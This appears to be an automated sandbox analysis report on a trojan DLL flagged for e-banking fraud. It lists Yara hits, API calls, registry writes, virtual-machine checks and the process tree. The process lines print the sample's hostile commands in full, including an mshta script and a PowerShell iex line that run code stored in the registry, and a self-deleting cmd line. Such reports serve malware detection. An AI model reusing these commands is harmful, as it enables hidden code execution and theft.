Source: Yara match | File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                      System Summary

Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: VoevdOQpeU.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F821C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F198A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F475F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058184D9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05808FA6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058237F4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05801E50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581C3A9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05820B0E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581488B CreateProcessAsUserW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F3A9C NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F4695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F25D7 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F8441 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05815D9D NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581F5FF memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05815CA1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058144A5 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05801C78 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581312E RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058212F1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581AD9E NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581B628 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581264B NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05815188 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058029B2 NtGetContextThread,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581C1C2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580A085 memset,NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05815830 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05801B92 NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05807A1E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: VoevdOQpeU.dll | Binary or memory string: OriginalFilename rpcapd.exe0 vs VoevdOQpeU.dll
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: VoevdOQpeU.dll | ReversingLabs: Detection: 38%
Source: VoevdOQpeU.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220423
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F57.tmp
Source: classification engine | Classification label: mal100.troj.evad.winDLL@29/23@0/2
Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F6DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1428
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{18B00793-9774-0A09-E1CC-BBDEA5C01FF2}
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{107D1110-2FAD-C278-3944-D3167DB8B7AA}
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: VoevdOQpeU.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb | source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb | source: loaddll32.exe, 00000000.00000000.287938913.0000000000480000.00000002.00000001.01000000.00000003.sdmp, VoevdOQpeU.dll
Source: Binary string: ntdll.pdbUGP | source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049FB2FF push esi; retf (2_2_049FB301)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F820B push ecx; ret (2_2_049F821B)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F7E20 push ecx; ret (2_2_049F7E29)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05812C1A push ecx; mov dword ptr [esp], 00000002h (2_2_05812C1B)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058237E3 push ecx; ret (2_2_058237F3)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058232B0 push ecx; ret (2_2_058232B9)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: bscdh0f0.dll.28.dr | Static PE information: real checksum: 0x0 should be: 0x5d5f
Source: poet0yxq.dll.26.dr | Static PE information: real checksum: 0x0 should be: 0xdf1c
Source: VoevdOQpeU.dll | Static PE information: real checksum: 0x872fe521 should be: 0xab1d3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll (dropped file)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll (dropped file)

                      Hooking and other Techniques for Hiding and Protection

                      Source: Yara match | File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll"
                      Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764 | Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5717
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3615
                      Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_0580FCC0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_0580CE21
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05805A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_05805A14
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0580591B
                      Source: explorer.exe, 00000021.00000000.427438325.00000000051AC000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000021.00000000.427485687.00000000051D2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000021.00000000.384966300.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.383500997.000000000510C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.427485687.00000000051D2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                      Source: mshta.exe, 00000017.00000003.329575243.0000022F66BCE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: mshta.exe, 00000017.00000003.329575243.0000022F66BCE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.383500997.000000000510C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0580A513
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort
